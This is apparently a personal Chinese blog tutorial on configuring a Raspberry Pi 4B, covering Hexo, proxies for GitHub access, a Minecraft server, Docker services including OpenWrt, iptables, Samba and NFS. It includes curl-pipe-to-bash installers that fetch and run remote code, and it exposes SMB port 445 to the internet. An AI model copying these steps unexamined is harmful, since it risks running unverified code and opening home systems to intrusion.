[toc]

入门/萌新篇

安装树莓派基地系统

买回来一块树莓派4b裸板,首先得给它刷上系统。那么选官方的树莓派系统呢?还是选一个干净的ubuntu系统呢?嘿嘿,我们都不选,我们使用树莓派爱好者基地编译好的树莓派基地系统。里面集成了各种功能强大的图像化面板。

优化/关闭多余服务

安装宝塔服务

宝塔面板下载,免费全能的服务器运维软件 (bt.cn)

进阶/折腾篇

raspberry安装 hexo博客

学习raspberry是少不了折腾的,每一次的折腾都能积累不少经验,这些失败的记忆和折腾的历程会伴随时间慢慢淡去,一个博客能够记下你的学习历程以及知识的积累。那么,入门的萌新都不舍得花钱买服务器,公网ip,域名等等。那么,我们现在开始搭建的博客,可以在有“免费的x级域名”的github下用“免费的仓库”来搭建我们“宝贵的知识宝库”。

首先我们安装nvm

1
wget https://github.com/nvm-sh/nvm/archive/refs/tags/v0.39.1.tar.gz

然后解压

1
tar -xzvf v0.39.1.tar.gz

进入解压目录中

1
cd nvm-0.39.1/

安装

1
./install.sh

执行完成后会弹出这样的信息

export NVM_DIR=”$HOME/.nvm”
[ -s “$NVM_DIR/nvm.sh” ] && . “$NVM_DIR/nvm.sh” # This loads nvm
[ -s “$NVM_DIR/bash_completion” ] && . “$NVM_DIR/bash_completion” # This loads nvm bash_completion

然后在终端粘贴这个命令配置环境

1
2
3
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion

检测nvm是否安装成功

1
nvm --version

查看已经安装的版本

1
nvm list

查看可安装版本

如何查看通过NVM安装的Node.js版本呢?
你可以直接使用NVM命令:

1
2
# raspberry
nvm list available

安装Node.js

我们安装16.15.1版本node.js:

1
nvm install 16.15.1

激活Node.js版本

我们安装好Node.js以后,需要激活它

1
nvm use 16.15.1

换腾讯的源

1
npm config set registry http://mirrors.cloud.tencent.com/npm/

安装Git

1
apt-get install git

安装hexo博客软件

1
npm install -g hexo-cli

创建博客orange目录

1
mkdir orange

初始化博客目录

1
2
cd orange 
hexo init

启动博客服务

1
2
# 在orange目录里面,执行后去4000端口查看博客生成
hexo s

image-20220830135622620

终端

临时获得访问GitHub

很多时候,我们使用终端去克隆下载GitHub的东西的时候,发现会被拒绝的现象出现,这个原因是我们国家的GFW在发挥着不可或缺的作用,那么Github在世界是有大量的CDN节点的,我们可以利用这个特性,让我们的终端临时性重新获得下载东西的能力。

首先,访问tool.lu把域名的ip解析出来

image-20230125230205943

然后修改Linux系统的/etc/hosts文件

image-20230125230244687

那么终端就能临时性的访问Github的能力了。

终端代理访问GitHub

如果你们设计了本地代理软件的话,可以把局域网共享打开然后让树莓派也获得访问GitHub能力,这样终端下载国外的deb包速度也是很快的(因为我不习惯换国内源,国内源删太多东西了,有些资源包说没有的时候比下的慢更难受)

1
2
3
4
5
6
7
8
9
10
11
12
vim /etc/profile

function proxy_on() {
export http_proxy=http://your_ip:your_port
export https_proxy=$http_proxy
echo -e "终端代理已开启。"
}

function proxy_off(){
unset http_proxy https_proxy
echo -e "终端代理已关闭。"
}

弄好后,记得要source /etc/profile让其临时生效,不然就要重启才能使用了

通过proxy_on启动代理,proxy_off关闭代理。

可以执行curl cip.cc验证:

1
2
3
4
5
6
7
8
9
10
11
root@raspbian:~# proxy_on
终端代理已开启。
root@raspbian:~# curl cip.cc
IP : 3.113.4.154
地址 : 美国 美国

数据二 : 日本 | 东京Amazon数据中心

数据三 : 美国华盛顿 | 亚马逊

URL : http://www.cip.cc/3.113.4.154

更加先进的clash终端代理

下载项目

博客备份下载

1
$ git clone https://github.com/Elegycloud/clash-for-linux-backup.git

进入到项目目录,编辑.env文件,修改变量CLASH_URL的值。

1
2
$ cd clash-for-linux
$ vim .env

注意: .env 文件中的变量 CLASH_SECRET 为自定义 Clash Secret,值为空时,脚本将自动生成随机字符串。

启动程序

直接运行脚本文件start.sh即可

  • 进入项目目录
1
$ cd clash-for-linux
  • 运行启动脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ sudo bash start.sh

正在检测订阅地址...
Clash订阅地址可访问! [ OK ]

正在下载Clash配置文件...
配置文件config.yaml下载成功! [ OK ]

正在启动Clash服务...
服务启动成功! [ OK ]

Clash Dashboard 访问地址:http://<ip>:9090/ui
Secret:xxxxxxxxxxxxx

请执行以下命令加载环境变量: source /etc/profile.d/clash.sh

请执行以下命令开启系统代理: proxy_on

若要临时关闭系统代理,请执行: proxy_off
1
2
$ source /etc/profile.d/clash.sh
$ proxy_on
  • 检查服务端口
1
2
3
4
5
$ netstat -tln | grep -E '9090|789.'
tcp 0 0 127.0.0.1:9090 0.0.0.0:* LISTEN
tcp6 0 0 :::7890 :::* LISTEN
tcp6 0 0 :::7891 :::* LISTEN
tcp6 0 0 :::7892 :::* LISTEN
  • 检查环境变量
1
2
3
$ env | grep -E 'http_proxy|https_proxy'
http_proxy=http://127.0.0.1:7890
https_proxy=http://127.0.0.1:7890

以上步骤如果正常,说明服务clash程序启动成功,现在就可以体验高速下载github资源了。

重启程序

如果需要对Clash配置进行修改,请修改 conf/config.yaml 文件。然后运行 restart.sh 脚本进行重启。

注意: 重启脚本 restart.sh 不会更新订阅信息。

停止程序

  • 进入项目目录
1
$ cd clash-for-linux
  • 关闭服务
1
2
3
$ sudo bash shutdown.sh

服务关闭成功,请执行以下命令关闭系统代理:proxy_off
1
$ proxy_off

然后检查程序端口、进程以及环境变量http_proxy|https_proxy,若都没则说明服务正常关闭。

Clash Dashboard

  • 访问 Clash Dashboard

通过浏览器访问 start.sh 执行成功后输出的地址,例如:http://192.168.0.1:9090/ui

  • 登录管理界面

API Base URL一栏中输入:http://:9090 ,在Secret(optional)一栏中输入启动成功后输出的Secret。

点击Add并选择刚刚输入的管理界面地址,之后便可在浏览器上进行一些配置。

  • 更多教程

此 Clash Dashboard 使用的是yacd项目,详细使用方法请移步到yacd上查询。

终端界面选择代理节点

部分用户无法通过浏览器使用 Clash Dashboard 进行节点选择、代理模式修改等操作,为了方便用户可以在Linux终端进行操作,下面提供了一个功能简单的脚本以便用户可以临时通过终端界面进行配置。

**脚本存放位置:scripts/clash_proxy-selector.sh**

注意:

使用脚本前,需要修改脚本中的 Secret 变量值为上述启动脚本输出的值,或者与 .env 文件中定义的 CLASH_SECRET 变量值保持一致。

备份

备份一个盘符

首先,先确定盘符,然后开始备份

1
dd bs=4M if=/dev/sda | gzip > bask-raspberry.img.gz

解压至盘符

1
gzip -cd bask-raspberry.img.gz | dd bs=4M of=/dev/sda

备份到远程服务器

1
scp -p bask-raspberry.img.gz user@ip:path/

scp 和 rsync : scp是每次传都是重新重传独立的一份,rsync使用的是差分传输算法,只会传输发生了变化的那部分

定时备份脚本

1
2
3
4
5
#!/bin/bash
TODAY=$(date + "%F")
cd /home/pi
tar -czf mydocsbackup-"$TODAY".tgz Documents
scp mydocsbackup-"$TODAY".tgz user@ip:path/bak/

这里需要双方互换ssh-key,不然需要验证密码,这样脚本就无法完成最后一步

命令

学到这里了,那么我默认你已经是具有RHCSA(RHCSA是Red Hat Certified System Administrator的简称,属于红帽linux的初级入门认证)的实力。下面学到的命令,跟RHCSA学到的可以起到相辅相成的作用。

安全移除数据

别以为,你rm -rf就是删掉了数据,其实跟win一样都是只删掉了对应的inode表项,是可以通过修复底层数据的修复来还原整个文件系统,如果你需要安全清理某些敏感数据,可以试一下shred这是通过多次覆盖,下面是覆盖5次。(其实dd命令也是可以以比特为单位覆盖数据,shred能干多次而已)

1
2
shred -v -n 5 a.txt
shred -v -n 5 /dev/sdb

我的世界

我的世界启动器安装

HMCL

HMCL

下载好后点开安装即可

我的世界程序安装

想要我的世界服务跑起来,光有启动器是不行的,还得有我的世界程序。那么这个 程序可以跑在本地电脑(自己一个人游玩和局域网内和小伙伴们一起游玩),也可以跑在公网服务器上(自己游玩的同时,小伙伴们也不限制在局域网连机,小伙伴可以在各自的家里舒舒服服地躺着玩,也因为是公网服务器,世界各地的小伙伴也可以进来happy,只不过由于地域距离的问题,他们要顶着高ping和国人玩耍。正常来讲是我们顶着高ping去玩人家的服务器,网易服务器的尿性你们懂的!!!)

raspberry树莓派4b部署我的世界

pinecraft里面已经支持到了1.20.1,旧版本的MC也可以通过之前发布的版本找到,本次以1.16.5作为安装教程。

image-20230714173342531

pinecraft项目所在地

下载安装程序:

1
git clone  https://github.com/Cat5TV/pinecraft.git

进入下载程序目录:

1
cd pinecraft/

安装

1
sudo ./install

image-20230216185458839

敲下安装命令可以看到一个非常好看的安装界面,不要吐槽,这在linux算是貂蝉西施那样的尤物了。我们按下两下空格,等待安装包下载。。。

image-20230216185626671

下面是安装路径和启动用户(pi),我们按下空格确认,这样我就知道程序运行在哪里,运行程序的用户是谁了。

image-20230216185652951

选择种子。。。

image-20230217111118092

选择服务器是什么版本的我选择fabric的。。。因为我只会fabric,你们如果不会直接默认paper(人家优化好说不定。。。)

image-20230217113335192

模式选择生存模式

image-20230217111444649

同意一下协议

image-20230217111500058

它想写点东西进你的boot

image-20230217111533209

意思是。。。把你的树莓派超频到1.9Ghz,吃掉你的树莓派内存4398MB~5319MB,要记得你这我的世界的版本是1.16.5

image-20230217113423508

image-20230217112021350

image-20230217113447754

image-20230217113513324

1
htop

可以看出mc吃内存和占用cpu很高

image-20230217113613574

切换用户

1
su - pi

进入目录

1
cd minecraft/

编辑文件,允许非正版用户加入MC

1
vim server.properties

改成false

image-20230217120355525

我们来看一下这个MC目录里面的结构

image-20230217121055428

里面有个叫server的执行文件,我们可以修改里面给java赋予的内存,可以把最小值改到1G即(1024M)

image-20230217121345778

我一般喜欢把能降低的都降低。。。尽量压缩使用内存留给更多后续服务

然后执行停止命令

1
./stop

然后执行运行我的世界命令

1
screen -R MC

然后

1
./server

image-20230217121804146

等待到100%就可以使用启动器进入我的世界了

image-20230217121841038

我们按住ctrl+a然后ctrl+d就能把这个sscreen程序运行的mc服务常驻后台

我们再看看htop,先后对比

修改server之前

image-20230217113613574

修改server之后

image-20230217122052848

Mem内存的使用状况已经降低,我们可以为后续加mod留出更大的空间

查看服务器ip

1
ip add

image-20230217123031830

由上面,可以知道我们MC服务器ip是内网地址192.168.0.107,那么我本机也是在内网的可以直接连接。

image-20230217123149553

启动器打开,进MC,左上角FPS达到惊人的98

image-20230217122542979

启动器

我们刚刚安装好HMCL后,打开应该都是这个样子

image-20230321145515476

我们首先登录账号,如果有微软正版账号也可以用正版登录,这里选择离线模式和微软账号都没有任何区别,这里用离线模式登录。

image-20230321145856307

image-20230321145933639

然后,回到最初界面,可以看到有个用户了。

image-20230321150044259

接下来,我们选择我的世界版本。

image-20230321150123098

点击安装新游戏版本

image-20230321150153176

我们服务器安装的就是1.16.5fabric版本

image-20230321150303388

image-20230321150521647

image-20230321150550571

image-20230321150605561

我们还是遵循选新不选旧原则

image-20230321150639242

本体+fabric+fabric API确认无误之后然后点击安装

image-20230321151023930

点击安装,静待安装成功

image-20230321151106422

安装成功,回到最初界面,发现图标变了。

image-20230321151213363

点击游戏开始玩原汁原味的MC 1.16.5吧!!!

加装光影

光影只会占本地端电脑的性能,不关linux服务器的事,所以光影只需放在本地即可

然后,在本地电脑端找到.minecraft–>shaderpacks放入下载好的光影压缩包

image-20230328202947555

然后在游戏加载光影压缩包即可

image-20230321151636309

材质包
加装mods

MOD它是一个英语的缩写,它的全称应该是modification,这个其实是修改的意思,不过中文给音译过来变成了“模组”,所以MOD其实就是游戏模组,作用就是对原本的游戏内容再加入一些新的东西,让我的世界这款游戏,更加的多样化。

这里有个要点,就是服务器加mod,本地不加mod是无法调用mod的。反之,本地加了mod,服务器没有加mod也是用不了的。必须要两端都加mod才能成功使用mod。

首先,在你linux服务器上面找到你mc的服务文件夹,然后cd进去,然后ls一下就能看到mods文件夹了

image-20230328201940861

在网上找到喜欢的mod,然后下载相对应版本的mod放进去mods文件夹中

image-20230328202239098

就是这样啦!什么模组菜单啦!一键整理啦!创世神啦!

然后,在本地电脑端也要找到.minecraft–>mods放入和服务器端一样的mod

image-20230328202522867

打开游戏就会自动和服务器同步载入mod啦

MC调用独显帧率暴涨

搭好MC会发现,进去玩的时候50多帧,下雨的时候直接掉到40多帧,这怎么办?

F3可以看到这个图,左边的52FPS夜晚状态,中间的GPU占用72%,右边的CPUI5-12450H可以知道目前使用的是CPU的核显,那个性能懂得都懂。

image-20230711235352153

接下来教你们怎么驱动独显跑MC,帧率暴涨,首先打开MC的启动器,我的以HMCL作为演示。

image-20230711235836145

打开HMCL,然后点击设置

image-20230711235920070

记住这个java路径

image-20230712000007798

点击电脑的开始菜单,找到设置按钮,并且点击进去

image-20230712000136395

找到游戏选项,点击进去

image-20230712000217306

Xbox Game Bar找到右上角这个图形设置,并且点击进去

image-20230712000315575

打开里面的硬件加速GPU计划,再点击下方的浏览找到Java的路径

image-20230712000438716

java.exe,javac.exe,javaw.exe这三个都加入进去

image-20230712000701293

并且三个都设置为独显

image-20230712000845161

image-20230712000925958

设置完成之后重启电脑,再次打开MC的F3就能看到帧率暴涨了

F3可以看到这个图,左边的144FPS夜晚状态,中间的GPU占用10%,右边的CPUI5-12450H,但是下方多了个3050显卡

image-20230712001320008

ZeroTier

最最最最nb的内网穿透工具!

zt安装命令

1
curl -s https://install.zerotier.com | sudo bash

自己先去zt官网创建网卡,然后需要的设备安装zt并且加入该网络就行了,支持linux、苹果和安卓手机、win电脑、mac等

pi-apps

https://github.com/Botspot/pi-apps

docker

安装docker

Centos

1
curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun

阿里云源

1
2
3
sudo yum-config-manager \
--add-repo \
https://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo

官方源

1
2
3
sudo yum-config-manager \
--add-repo \
https://download.docker.com/linux/centos/docker-ce.repo

由于树莓派基地系统自带了docker,我们只需要将docker服务启动即可,为了docker能够更好完成和为我们设备提供优质服务,这里建议将docker设置为开机自启。

1
2
3
4
5
6
7
8
9
10
11
12
# 查看docker状态
root@raspbian:~# systemctl status docker.service
# 开机自启docker
root@raspbian:~# systemctl enable docker.service
# 关闭开机自启docker
root@raspbian:~# systemctl disable docker.service
# 关闭docker
root@raspbian:~# systemctl stop docker.service
# 开启docker
root@raspbian:~# systemctl start docker.service
# 关闭再开启docker
root@raspbian:~# systemctl restart docker.service

怎么说咧!想要玩得起docker,有个地方是我们不得不去的,那就是docker的官方宝藏之地——Dockerhub,里面有世界各地说话又好听、技术又高的大佬,他们写好的容器则上传到了dockerhub,这些容器就是一个小型的服务或者说是应用。这些应用可以独立或者混合其他容器一起使用。我们后面会讲到部署一个wordpress博客然后用到mariadb数据库容器的案例。再此之前,我们还是先老老实实去b站学习有关docker的各种课程,学习好docker对我们后面学习其他的容器化有很大帮助,而docker里面的网络内容则会贯穿整个进阶篇章。

配置镜像加速

额,换了上面的源就别搞下面的加速了

镜像加速

1
vim /etc/docker/daemon.json

加入这个中科大的源

1
2
3
{
"registry-mirrors": ["https://docker.mirrors.ustc.edu.cn"]
}

重新加载配置

1
systemctl daemon-reload
1
systemctl restart docker

docker-compose安装

docker-compose二进制执行包

把二进制包放下面路径

1
/usr/local/bin/

并且改名为docker-compose就行了

papermc-server

minecraft-papermc-server

openwrt

openwrt软路由可以替我们电脑实现一些魔法上网的功能,将fq功能给予树莓派处理可以让我们的fq体验更加顺畅丝滑。

下面我以docker容器化部署一下openwrt,实现家庭设备魔法上网。

拉取镜像

1
2
# 先下载openwrt镜像,这个镜像是树莓派4b的openwrt镜像
docker pull registry.cn-shanghai.aliyuncs.com/suling/openwrt:rpi4

查看镜像

1
docker images

打开网卡混杂模式

1
sudo ip link set eth0 promisc on 

创建网络(须结合实际网络情况,不能照抄命令)

1
docker network create -d macvlan --subnet=192.168.1.0/24 --gateway=192.168.1.1 -o parent=eth0 macnet
1
2
3
4
5
6
7
8
9
--subnet=192.168.1.0/24  #树莓派正所处在192.168.1.x网段

--gateway=192.168.1.1 #树莓派的网关(即路由器ip)

parent=eth0 #这个是物理网卡名字

macvlan #这是创建的一个驱动程序macvlan管理网络(已经创建了192.168.1这个网络段给它)

macnet #macnet创建的网络名字

查看macnet网络创建程度

1
docker network ls

创建并启动容器

1
docker run --restart always --name openwrt -d --network macnet --privileged registry.cn-shanghai.aliyuncs.com/suling/openwrt:rpi4 /sbin/init

进入容器并修改相关参数

1
docker exec -it openwrt bash

执行此命令后我们便进入 OpenWrt 的命令行界面,首先,我们需要编辑 OpenWrt 的网络配置文件:

1
vim /etc/config/network

我们需要更改 Lan 口设置:

1
2
3
4
5
6
7
8
9
10
config interface 'lan'
option type 'bridge'
option ifname 'eth0'
option proto 'static'
option ipaddr '192.168.1.100' #自己设置一个ip,这个ip是你即将要访问的openwrt控制面板
option netmask '255.255.255.0'
option ip6assign '60'
option gateway '192.168.1.1'
option broadcast '192.168.1.255'
option dns '8.8.8.8'

所有的 192.168.1.x 需要根据树莓派所处网段修改,option gateway填写路由器的 IP。

option ipaddr 项目定义了 OpenWrt 的 IP 地址,在完成网段设置后,IP最后一段可根据自己的爱好修改(前提是符合规则且不和现有已分配 IP 冲突)。

重启网络

1
/etc/init.d/network restart

输入完成这段命令之后,按住键盘的ctrl+p+q就能退出openwrt容器的命令行界面。

如果有更换mac的要求,下面给一个临时更换的办法,重启会失效要注意哦!

1
ip link set dev br-lan address 12:34:56:78:9A:BC

进入控制面板

在浏览器中输入option ipaddr 项目中的 IP 进入 Luci 控制面板,若option ipaddr 的参数为 192.168.1.100,则可以在浏览器输入 http://192.168.1.100进入控制面板。

用户名:root

**密码:password **

image-20221222182120848

登录进去后可以看到树莓派的基础信息、cpu架构、cpu温度等信息

image-20221222182250444

fq的功能配置:左边的列表选择服务–>PassWall,可以看到这个界面。

image-20221222182535583

首先,打开里面的主开关

image-20221222182649678

复制fq节点的订阅地址到节点订阅选项

image-20221222183121714

设置完成之后点击手动订阅可以看到相应日志

image-20221222183224283

回到节点列表就可以看到大量节点出现

image-20221222183338376

我一般喜欢开放固定端口代理流量,这样我就可以通过ip+端口使用代理服务器

image-20221222183615463

image-20221222183815397

image-20221222183910155

image-20221222183920184

清理完成刷新一下,fq服务就可以使用了。win系统有代理功能的,首次fq可以先在win系统里面设置,然后打开谷歌浏览器安装代理插件。

image-20221222184044294

image-20221222184141529

image-20221222184202042

这样可以很好的切换,而且只有浏览器能够fq,想要电脑全局fq就在代理里面设置ip+端口即可。记住win的代理和浏览器的插件只能开一个,别环路了。。。

网络修复

用久了发现,树莓派居然没办法将自己的流量代理这就很离谱了,我用ping命令测试了openwrt的容器ip,发现是没办法ping通的,然后把openwrt防火墙清空了还是不行。在同一个网段下,主机居然无法ping通自己肚子里openwrt,这里我重新想了docker容器和主机之间的网卡之间的关系。

我认为,我在发送ping命令的icmp给openwrt的时候,流量通过树莓派的物理网卡出去了,但是路由器说流量应该流回树莓派内,然后接收到流量的树莓派因为规则把这股流量给丢弃了(因为没有找到内部的openwrt设备ip),这是我的猜想。

所以,我觉得应该桥接一个网卡出来,这个网卡是和树莓派、openwrt都在同一个网段下的才行,而且ip要独立(非树莓派的ip、非openwrt的ip)

编辑/etc/network/interfaces文件

1
2
3
4
5
6
7
8
9
# 添加下面
auto macvlan
iface macvlan inet static
address 192.168.1.5 #这个ip一定要非树莓派的ip和非openwrt的ip
netmask 255.255.255.0
gateway 192.168.1.1 #要同一个网段
dns-nameservers 192.168.1.1
pre-up ip link add macvlan link eth0 type macvlan mode bridge
post-down ip link del macvlan link eth0 type macvlan mode bridge
  • pre-up ip link add macvlan link eth0 type macvlan mode bridge: 在接口启动之前,使用 ip link add 命令创建一个名为 macvlanmacvlan 类型的子接口,连接到 eth0 主接口上,以桥接模式运行。
  • post-down ip link del macvlan link eth0 type macvlan mode bridge: 在接口关闭之后,使用 ip link del 命令删除 macvlan 子接口。

重启树莓派即可,就发现可以pingopenwrt的容器ip

docker版的openwrt还有其他的很多功能,可以自己私下去探索,这里就不再多说了,各自努力吧!

aria2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
docker run -d \
--name aria2-pro \
--restart unless-stopped \
--log-opt max-size=1m \
-e PUID=$UID \
-e PGID=$GID \
-e UMASK_SET=022 \
-e RPC_SECRET=orange \ # 这个自定义,一定要记住
-e RPC_PORT=6800 \
-p 6800:6800 \
-e LISTEN_PORT=6888 \
-p 6888:6888 \
-p 6888:6888/udp \
-v $PWD/aria2-config:/config \
-v $PWD/aria2-downloads:/downloads \
p3terx/aria2-pro

WebUI

1
2
3
4
5
6
docker run -d \
--name ariang \
--log-opt max-size=1m \
--restart unless-stopped \
-p 6880:6880 \
p3terx/ariang

mariadb

先拉取mariadb

1
docker pull mariadb

下面需要修改的地方就是密码password修改成为自己需要的密码就可以刷入命令了

1
docker run --restart=always --name mariadb01 -p 3306:3306 -e MYSQL_ROOT_PASSWORD=password -v /data/mariadb/mysql.conf.d/mysql.cnf:/etc/mysql/mysql.conf.d/mysql.cnf -v /data/mariadb/data:/var/lib/mysql -d mariadb

那么再教你个好玩的,使用Navicat连接数据库爽的一批

image-20230328163059348

image-20230328163207688

wordpress

httpbin

现在越来越多的测试人员除了功能测试外,都已开始接触并进行接口测试。在学习接口测试时,尤其对于测试新手来说,接口测试工具上怎样填写请求地址、方法、请求参数等,还是多多少少有些困难,而且往往找不到合适的调试与请求的接口服务地址而无从练手。那么本地化部署httpbin就能满足你对接口调试的需求啦

1
docker pull kong/httpbin
1
docker run -d --restart always -p 8080:80 --name httpbin kong/httpbin:latest

image-20230725232514912

双网卡内外网优先级设置

根据自己的需要,有时候树莓派需要两张网卡,一张用于访问外网(wlan0),另一种用于连接内网(eth0)。

image-20230429233559391

我们可以看到这里连接了两个网卡,分别是wlan0和eth0,在我们学数通知识的时候,我们老师会教我们网络的知识,直连的跃点数是会比连接wifi的是要更小的(普遍情况下是这样,不要和我杠,杠的要不你别学)

image-20230429234002039

这里,我设计的网络是eth0是面向内网的,对我的nas起到稳定的网络传输和安全性;而wlan0是连接了我的热点,这里我ping了一下8.8.8.8,发现是完全ping不同的。

我们再查看了网络优先级方面,发现eth0的网络优先级是比wlan0高的(即eth0的网络跃点数metric比wlan0的跃点数metric要小)

我们可以使用以下命令查看跃点数

1
root@raspberrypi:~# ip route show

image-20230429234447247

一个100一个600,看得很清楚吧。这里我把wlan0跃点数调到99,192.168.137.1是路由器网关地址

1
root@raspberrypi:~# sudo ip route add default via 192.168.137.1 dev wlan0 proto dhcp metric 99

image-20230429234927301

wlan0这个网卡优先级马上就第一了,那么不出意外的话,这个网络就能通了

image-20230429235048919

上面讲的这个咧,是临时解决办法,要是想一劳永逸呢还是要把IPV4_ROUTE_METRIC=99这个写入到网卡配置文件中,但是。。。很不巧树莓派貌似没有。。。除非你用的不是树莓派官方的

那么我们也有另外的处理办法,把sudo ip route add default via 192.168.137.1 dev wlan0 proto dhcp metric 99这个命令写入一个文本里面,然后添加入contab里面,命令如下:

1
2
3
4
5
6
root@raspberrypi:/usr/bin# /usr/bin
root@raspberrypi:/usr/bin# vim network_metric
#!/bin/bash
ip route add default via 192.168.137.1 dev wlan0 proto dhcp metric 99

root@raspberrypi:/usr/bin# chmod +x network_metric

这里是设置开机执行文件

1
2
root@raspberrypi:/usr/bin# crontab -e
@reboot bash /usr/bin/network_metric

树莓派跑win98

看到这个标题是不是很疯狂?确实。。。真离谱

run-windows-98-on-raspberry-pi-with-dosbox-x

树莓派安装win10、win11

这个更逆天

wor-flasher

微型电台-FM

树莓派的 GPIO 引脚可以用作信号输出,因此,可以把音频信号通过树莓派进行 FM 调制后从 GPIO引脚送出,这样树莓派就变成了一个微型FM 发射器,即微型电台,可以自己指定发射频率,打开 FM 调频收音机,调到对应频道就可以接收到树派播放的 FM 广播信号了。
通过安装 PiFmRds 来将树莓派变成微型 FM 电台

安装过程

首先,执行以下命令,安装 sndfile 库:

1
sudo apt-get install libsndfile1-dev

第二步,执行以下命令,克隆 PiFmRds 的源代码:

1
git clone https://github.com/ChristopheJacquet/PiFmRds.git

第三步,执行以下命令,进行编译:

1
2
3
cd PiFmRds/src
make clean
make

播放命令

编译完成后,可以执行 sudo ./pi_fm_rds 命令发射 FM信号。pi_fm_rds 命令格式为:

1
sudo ./pi_fm_rds -audio [filename] -freq [frequency]

其中-audio [filename]是指定播放文件是wav格式的音频文件;

-freq [frequency]是指定发射信号的频率

下面是不指定发射信号播放666.wav文件

1
2
3
4
5
6
7
8
9
10
root@ubuntu:~/PiFmRds/src# pwd
/root/PiFmRds/src
root@ubuntu:~/PiFmRds/src# sudo ./pi_fm_rds
root@ubuntu:~/PiFmRds/src# sudo ./pi_fm_rds
Using mbox device /dev/vcio.
Allocating physical memory: size = 3403776 mem_ref = 4 bus_addr = fe8bb000 virt_addr = 0xffff94ea1000
ppm corr is 0.0000, divider is 1644.7368 (1644 + 3018*2^-12) [nominal 1096.4912].
PI: 1234, PS: <Varying>.
RT: "PiFmRds: live FM-RDS transmission from the RaspberryPi"
Starting to transmit on 107.9 MHz.

image-20230610164626929

然后新建一个shell窗口,执行播放文件

1
root@ubuntu:~/PiFmRds/src# sudo ./pi_fm_rds -audio 666.wav 

image-20230610164453696

用FM收音机接收107.9MHZ信号,可以听到文件声音

微信图片_20230610164817

增强播放效果

在树莓派 GPIO 4(物理引脚编号为7)接上一根长 20m 的杜邦线作为发射天线来增强 FM 信号,然后使用 FM(调频)收音机收听,在 1m 范围内音质很清晰,在3m 范围内仍然可以听得见,超过 3m 信号会很弱。

iptables

一、简介一下iptables

iptables命令中ACCEPT(允许流量通过)、LOG(记录日志信息)、REJECT(拒绝流量通过)、DROP(拒绝流量通过)。允许动作和记录日志工作都比较好理解,着重需要讲解的是这两条拒绝动作的不同点,其中REJECT和DROP的动作操作都是把数据包拒绝,DROP是直接把数据包抛弃不响应,而REJECT会拒绝后再回复一条“您的信息我已收到,但被扔掉了”,让对方清晰的看到数据被拒绝的响应。

四表五链

命令解释
1
2
3
4
5
6
7
8
9
10
11
12
# 允许192.168.1.0/24这个IP段的流量流进服务器的80端口
iptables -I INPUT -s 192.168.1.0/24 -p tcp --dport 80 -j ACCEPT

# 只允许本机22端口被192.168.1.0/24网段访问,其他流量均被拒绝。我们输入命令:
iptables -I INPUT -s 192.168.1.0/24 -p tcp --dport 22 -j ACCEPT

# 拒绝所有人访问本机4444到5555端口,输入命令:
iptables -A INPUT -p tcp --dport 4444:5555 -j REJECT
iptables -A INPUT -p udp --dport 4444:5555 -j REJECT

# 删除INPUT链中的第2条策略,首先我们看一下防火墙策略中的第二条策略是什么“iptables -L”,然后输入命令删除第2条策略:
iptables -D INPUT 2

当我们使用 ipt­a­bles 设置了一些规则后需要对这些设置永久保存,避免当服务器重启后规则消失需要重新配置。为了能够让 ipt­a­bles 规则永久保存,这里介绍两种方法:

1、 使用iptables-restore

在设置了一系列的 ipt­a­bles 规则后,首先需要切换到 root 用户,执行如下命令将规则保存到文件中:

1
2
3
# 这包括了ipv4和ipv6规则,如果只有ipv4的规则可以只执行第一条
iptables-save > /etc/iptables-rules
ip6tables-save > /etc/ip6tables-rules

然后编辑 /etc/net­work/in­ter­faces 文件,在对应的外网网卡下(通常是 eth0 接口,如果不是请按照实际情况添加,可以通过 if­con­fig 查看外网 ip 对应的网卡接口)插入下面两行:

1
2
pre-up iptables-restore < /etc/iptables-rules
pre-up ip6tables-restore < /etc/ip6tables-rules

这样当服务器重启后就能自动加载已经配置好的 ipt­a­bles 规则了。如果后续有添加新的规则则需要重新执行上面的 ipt­a­bles-save 命令更新规则文件即可

2、 使用iptables-persistent

这个方法是我更喜欢使用的,它实际操作起来更简单一些。

  • 首先安装iptables-persistent工具
1
sudo apt install iptables-persistent
  • 每当设置了新的iptables规则后,使用如下命令保存规则即可,规则会根据ipv4和ipv6分别保存在了/etc/iptables/rules.v4和/etc/iptables/rules.v6文件中。
1
2
3
4
# 保存现有规则
sudo service netfilter-persistent save
# 读取并应用先有规则
sudo service netfilter-persistent reload

由于 ipt­a­bles-per­sis­tent 在安装时已经把它作为一个服务设置为开机启动了,它在开机后会自动加载已经保存的规则,所以也就达到了永久保存的目的。其实原理和第一种方法是类似的,只是设置起来会更简单一些。

RaspAP

https://raspap.com/

NAS

samba

首先,安装samba服务

1
apt install samba samba-common-bin

添加文件配置

1
vim /etc/samba/smb.conf

配置如下:

1
2
3
4
5
[share]                      #共享文件夹名字,将在网络上显示此名称
path = /orange/share #共享文件夹的路径
valid users = orange #允许访问的用户名称
browseable = yes #允许浏览文件夹
writable = yes #可以写入文件

创建orange的linux用户

1
useradd -m orange

创建samba的orange用户并且设置密码

1
smbpasswd -a orange

重启samba服务即可访问

1
systemctl restart smbd.service

这里由于华为手机有隐私保护,不能截图,所以我已经登录账号密码进来了

微信图片_20230607011823

咳咳,都配了认证,那么我们是不是可以端口映射一下

把445映射出去即可

image-20230607015948428

手机和win电脑都验证过了,完全没问题。

NFS

安装rpcbind

1
apt install rpcbind

查看rpcbind.socket状态

1
systemctl status rpcbind.socket

image-20230508145322917

可以看出rpcbind.socket一直在监听端口

安装nfs

1
sudo apt install nfs-kernel-server

image-20230508145655757

查看rpcbind.socket状态

1
systemctl status rpcbind.service

image-20230508145512096

从上面安装好看nfs再查看rpcbind.service可以发现,nfs没开启服务,rpcbind.service也不会自动开启

这次,我们开启nfs再查看nfs和rpcbind.service的服务状态

1
systemctl restart nfs-kernel-server.service
1
systemctl status nfs-kernel-server.service

image-20230508145901666

1
systemctl status rpcbind.service

image-20230508145927673

可以看出,nfs服务启动后,rpcbind.socket检测到端口被激活从而开启了rpcbind.service服务

编辑/etc/exports

后面的权限我先不加,这里默认是只读

1
/data *

image-20230508152044419

重新加载配置(不需要重启服务)

1
